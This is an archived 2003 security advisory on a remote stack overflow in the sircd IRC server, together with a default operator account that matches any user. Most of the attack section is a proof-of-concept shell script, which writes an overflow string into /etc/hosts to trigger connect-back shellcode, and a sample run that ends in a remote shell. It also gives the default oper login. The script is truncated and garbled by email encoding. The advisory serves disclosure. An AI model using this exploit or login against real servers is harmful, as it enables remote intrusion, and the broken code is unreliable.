24th Feb 2003 [SBWID-6016]
sircd remote overflow
sircd v0.4.0, sircd-0.4.4
From Knud Erik Højgaard [[email protected]] advisory :
According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.
a: Insufficient bounds checking leads to execution of arbitrary
b: Default oper account matching *!*@*
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.
The buffer may be constructed as such: [94 bytes of crap][EBP ][EIP
][400 bytes for nops and shellcode], leaving us with plenty of space
both before and after eip to store our shellcode.=20
The accompanying .sh script is a silly proof of concept.=20 Below is a
fabricated copy of a typical run:
$ nc -l -v -p 10000
listening on [any] 10000 ...
# ./sircd.sh 127.0.0.1
sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
Game over man, game over
$ sircd &
sircd: v0.4.0 Alpha
Zarjazz ([email protected])
$ BitchX 127.0.0.1
[snip some bitchx output]
[fi] *** Welcome to the_server
[fi] *** Resolving IP 127.0.0.1
--from here on the connection freezes.
Game over man, game over
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
uid=3D1001(sircd-user) gid=3D1001(sircd-user) groups=3D1001(sircd-user)
b: type /oper bod bod bod in a connected irc-client.
# /usr/ports/irc/sircd ; sircd v0.4.0; FreeBSD 4.7-RELEASE-p2
# shellcode=3Dconnect back to port 10000 shellcode (72 bytes) by bighawk
# lousy script by knud
echo -e "\nsircd 0.4.0 proof-of-concept, usage $0 <ip-of-attacker>\n"
# assign variables
filler=3D`perl -e 'print "B" x 94'`
returnaddress=3D`perl -e '$i=3Dpack("l",0xbfafec04);print $i'`
egg=3D`perl -e 'print "\x90" x 328 . =
attackstring=3D`echo "$filler$returnaddress$returnaddress$egg"` #read->
# need uid=3D0 to modify /etc/hosts=20
if [ $UID -gt 0 ];=20
echo "UID =3D $UID, !=3D 0, cannot continue";=20
echo "UID check passed, backing up /etc/hosts"
# if we end up here all is well
cp /etc/hosts /etc/hosts.$$
echo -e "$attackerip\t$attackstring\t$attackstring" > /etc/hosts
echo -e "Now connect to the sircd from $attackerip"
echo -e "Press a key and enter to restore /etc/hosts"
if [ $restore =3D "" ];
then cp /etc/hosts.$$ /etc/hosts
else cp /etc/hosts.$$ /etc/hosts
echo "Game over man, game over"
The fix has been incorporated in the CVS tree as per 04/02-03